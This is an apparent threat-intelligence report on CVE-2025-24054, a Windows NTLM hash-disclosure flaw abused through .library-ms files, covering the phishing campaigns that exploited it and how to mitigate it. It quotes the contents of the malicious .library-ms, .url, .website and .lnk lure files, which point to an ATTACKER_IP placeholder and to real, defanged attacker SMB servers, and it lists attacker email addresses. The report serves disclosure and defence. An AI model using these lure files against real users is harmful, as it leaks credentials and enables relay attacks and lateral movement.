`.library-msfile. Active exploitation in the wild has been observed since` `.library-msfile was unzipped. However, Microsoft’s patch documentation indicated that the vulnerability could even be triggered with minimal user interaction, such as right-clicking, dragging and dropping, or simply navigating to the folder containing the malicious file. This exploit appears to be a variant of a previously patched vulnerability,`
**NTLM (New Technology LAN Manager)** is a suite of authentication protocols developed by Microsoft to verify user identities and protect the integrity and confidentiality of network communications. NTLM operates through a direct client-server exchange known as the **NTLM challenge/response mechanism**, in which the server challenges the client to prove its identity without sending the user’s actual password over the network.
The original version, **NTLMv1**, had several security flaws that made it vulnerable to attacks such as **pass-the-hash** and **rainbow table attacks**. In NTLMv1, the client responds to the server’s challenge by sending a predictable hash of the user’s password (the **NT hash**). Attackers could try to crack the password offline or reuse this hash if they managed to intercept it. To reduce these risks, Microsoft introduced **NTLMv2**, which significantly improves security by adding both a **random server challenge** and a **client challenge** into the authentication process. Instead of sending the NT hash directly, NTLMv2 generates a unique response known as the **NTLMv2 response** (also referred to as the **NTLMv2-SSP hash** or **Net-NTLMv2**). This renders precomputed attacks (like rainbow tables and pass-the-hash) largely ineffective.
However, if attackers are able to capture these NTLMv2 responses, they can still attempt to **brute-force** the hash offline or perform **relay attacks**. NTLM relay attacks fall under the category of **man-in-the-middle (MitM)** attacks that exploit the NTLM authentication protocol. Instead of cracking the password, the attacker captures the hash and passes it to another service to authenticate as the user. NTLM relay attacks are much more dangerous when the stolen credentials belong to a privileged user, as the attacker is using it for privilege escalation and lateral movement on the network.
In the past few months, Microsoft has been busy releasing security updates aimed at fixing NTLM Hash Disclosure vulnerabilities via spoofing. One such vulnerability, **CVE-2024-43451**, was patched on November 12, 2024, after it was exploited in a campaign targeting Ukraine. CERT-UA has linked this activity to UAC-0194, a threat actor believed to be connected to Russia. Fast forward to March 11, 2025, when Microsoft rolled out a patch for another similar vulnerability, **CVE-2025-24054**, which also allows NTLM hash disclosure with very little user interaction. For CVE-2025-24054, users can trigger the attack simply by right-clicking or navigating to the folder that holds the maliciously crafted `.library-ms` file.
Threat actors began actively exploiting CVE-2025-24054 just eight days after the patch was released. Since then, **Check Point Research** has reported multiple **malspam campaigns** leveraging this flaw, all observed within less than two weeks.
Microsoft, on March 11, 2025, released a security patch protecting against a vulnerability in Windows Explorer that leaks **NTLMV2-SSp** when a malicious `.library-ms` file is extracted from a ZIP archive. This vulnerability was classified with the CVE ID, **CVE-2025-24054** and was exploited in all the latest Windows versions. This vulnerability is triggered when a user extracts a ZIP archive containing a malicious `.library-ms` file. This event will trigger Windows Explorer to initiate an SMB authentication request to a remote server and, as a result, it leaks the user’s NTLM hash without any user interaction.
“`
\\ATTACKER_IP\SHARE_NAME
“`
The images below demonstrate network activity where a user’s **NTLMV2-SSp hash** is leaked via SMB to a malicious SMB server at IP address `194.127.179[.]157`. Once the user triggers the exploit with minimal interaction, the client initiates SMB requests. Upon processing the `NTLMSSP_AUTH` message, the client inadvertently leaks the user’s NTLMV2-SSp to the malicious server.
Exposing a user’s NTLMV2-SSp hash allows the attacker to obtain the user’s password by brute force or perform relay attacks. If the compromised account has high privileges and improper mitigations (such as SMB signing and NTLM relay protections), this could lead to lateral movement, privilege escalation, or even full domain compromise.
Microsoft had initially assigned the vulnerability the CVE identifier **CVE-2025-24071**, but it has since been updated to **CVE-2025-24054**.
Eight days after the Microsoft security patch, **Check Point Research** discovered the first campaign utilizing **CVE-2025-24054**. Until March 25, we have observed approximately another 10 campaigns with the end goal of retrieving NTLMV2-SSp hashes from the targeted victims. The SMB servers collecting those were hosted in Russia, Bulgaria, the Netherlands, Australia and Turkey.
The campaign appears to have occurred around March 20–21, 2025. The main targets seem to have been the Polish and Romanian governments and private institutions. The campaign targeted the victims via email phishing links, which include an archive file, downloaded from Dropbox. Once the user downloads and extracts the archive’s contents, it triggers the exploit that leaks the NTLMV2-SSp hash.
The archive `xd.zip` was downloaded from Dropbox and contained files with the sole purpose of leaking NTLMV2-SSp hashes. Those four embedded files contacted a malicious SMB server with IP address `159.196.128[.]120`.
**1. xd.library-ms – CVE-2025-24054**
Once the archive was unzipped, this file triggered **CVE-2025-24054,** an NTLM Hash Disclosure Spoofing Vulnerability.
“`
\\159.196.128[.]120\shared
“`
**2. xd.url – CVE-2024-43451**
The `.url` file extension is used to create **Internet shortcuts** that point to web addresses (URLs). URLs are plain text files that store a website’s address. When you double-click a `.url` file, your default web browser opens the corresponding URL. The `.url` file type can also reference network resources via a **UNC (Universal Naming Convention)** path. A UNC path points to a network location, usually in the format:
“`
\\ServerName\SharedFolder\Resource
“`
This path indicates a **network share** (e.g., a shared folder or file on another machine). The connections created are primarily based on the **network protocol** used and how the resource is shared. The most common type of connection established with UNC paths involves the **Server Message Block (SMB)** protocol. Triggering files that support UNC paths can potentially lead to **SMB (Server Message Block)** connections, which might expose sensitive information, including **NTLMv2 hashes.** The `.url` file embedded within this archive is associated with the **CVE-2024-43451** vulnerability, which has been actively exploited in the wild. The exploitation involves **.url files** containing malicious code capable of executing upon unusual user interactions. These interactions include **right-clicking** the file, **deleting** it, or performing a **drag-and-drop operation**.
“`
[InternetShortcut] URL=file://159.196.128[.]120/ IconIndex=4 HotKey=0 IDList= IconFile=\\159.196.128[.]120\share\pentestlab.ico
“`
This CVE was previously exploited as a zero-day vulnerability and was used in attacks targeting Ukraine. According to **CERT-UA**, the campaign was attributed to the threat actor **UAC-0194**, which is suspected to be **Russian-affiliated**.
**3. xd.website**
The `.website` file functions similarly to `.url` files but with some extra metadata designed for modern web applications. These files store **URL information** along with additional data such as **browser settings**, **app-specific settings**, and icons used for pinned web apps, making them slightly more advanced than the simpler `.url` files. They could also potentially link to a **local or network resource** via a UNC path, triggering an SMB connection once the user manually interacts with such files.
“`
[{000214A0-0000-0000-C000-000000000046}] Prop3=19,2 Prop4=31,go.microsoft.com [InternetShortcut] URL=file://159.196.128[.]120/ [{A7AF692E-098D-4C08-A225-D433CA835ED0}] Prop5=3,0 Prop9=19,0 Prop2=65,2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF310000002B000000710600006204000056 Prop6=3,1 [{9F4C2855-9F79-4B39-A8D0-E1D42DE1D5F3}] Prop5=8,Microsoft.Website.B4BD2547.99055A5E
“`
**4. xd.lnk**
The `.lnk` file extension is used for **Windows shortcuts**. A shortcut is essentially a pointer or reference to another file, folder, or program. When you double-click a `.lnk` file, Windows automatically opens the linked target file or application, which can be a program, document, or can be used to point to a network resource using a **UNC path**. Once the target path of an LNK file is a remote server, an SMB connection will be triggered, and upon the `NTLMSSP_AUTH` message, the client inadvertently leaks the user’s NTLMV2-SSp. The LNK file below, distributed as part of this archive, requires manual user interaction to trigger the SMB connection. Bellow is the LNK metadata:
“`
Target Path : \\159.196.128.120 Working Directory: None Arguments : None Description : None Icon Location : None Relative Path : ..\..\..\..\Windows Show Command : Normal
“`
All the mentioned files, once clicked manually by the user, attempt to access the network share, initiating an SMB connection, which potentially could expose NTLMV2-SSp hashes to the malicious actor. However, two of those files that used exploits did not even require the user to take such actions. The SMB server at `159.196.128[.]120` harvested such hashes, likely for use in further attack operations. In January 2024, cybersecurity firm **HarfangLab** reported this IP as being linked to **APT28,** also known as **Fancy Bear** or **Forest Blizzard** a Russian state-sponsored threat actor. However, at this time, we have no further information directly associating this IP with the mentioned APT group.
`.library-ms`
Initial reports indicated that exploitation was triggered once the `.library-ms` file was unzipped. However, on March 25, 2025, Check Point Research discovered a campaign targeting companies around the world, distributing these files without being zipped. According to Microsoft, _this exploit is triggered with minimal user interaction with a malicious file, such as selecting (single-clicking), inspecting (right-clicking), or performing any action other than opening or executing the file_.
At this stage, unzipping the file was merely a side effect that triggered the exploit, with the actual cause being any minimal user interaction that could activate it, such as navigating to the folder where the file is located. As soon as victims downloaded the exploit, their NTLMV2-SSp hashes were leaked.
“`
\\194.127.179[.]157\data
“`
Observed Attacker’s emails:
“`
1900001905[@]stu.iku.edu.tr estgv18503[@]alunos.estgv.ipv.pt m.elbadawy01791[@]com.dmu.edu.eg m.ghallab01992[@]com.dmu.edu.eg patricio.estay99895[@]edu.ipchile.cl poveda.l.2346[@]istlam.edu.ec thanakornn65[@]nu.ac.th ul0251085[@]edu.uni.lodz.pl walaa.20185492[@]buc.edu.eg
“`
The discovery and subsequent exploitation of **CVE-2025-24054**, a vulnerability involving **NTLM Hash Disclosure Spoofing**, underscores the growing sophistication of cyberattacks and the urgency for prompt patching and vigilance. Despite Microsoft releasing a security update on **March 11, 2025** to address the issue, the vulnerability was actively exploited less than two weeks later in campaigns targeting government and private institutions in **Poland** and **Romania**. These attacks leveraged malicious `.library-ms` files to collect **NTLMv2 hashes** and escalate the risk of **lateral movement** and **privilege escalation** within compromised networks.
This rapid exploitation highlights the critical need for organizations to apply patches immediately and ensure that **NTLM vulnerabilities** are addressed in their environments. The minimal user interaction required for the exploit to trigger and the ease with which attackers can gain access to **NTLM hashes** make it a significant threat, especially when such hashes can be used in **pass-the-hash** attacks. With the ongoing evolution of these attack vectors, staying ahead of the threat requires a proactive approach to both **patch management** and **network security**, as attackers continually adapt to find new ways to exploit weaknesses.
Check Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics, file types, and operating systems and protect against the attacks and threats described in this report.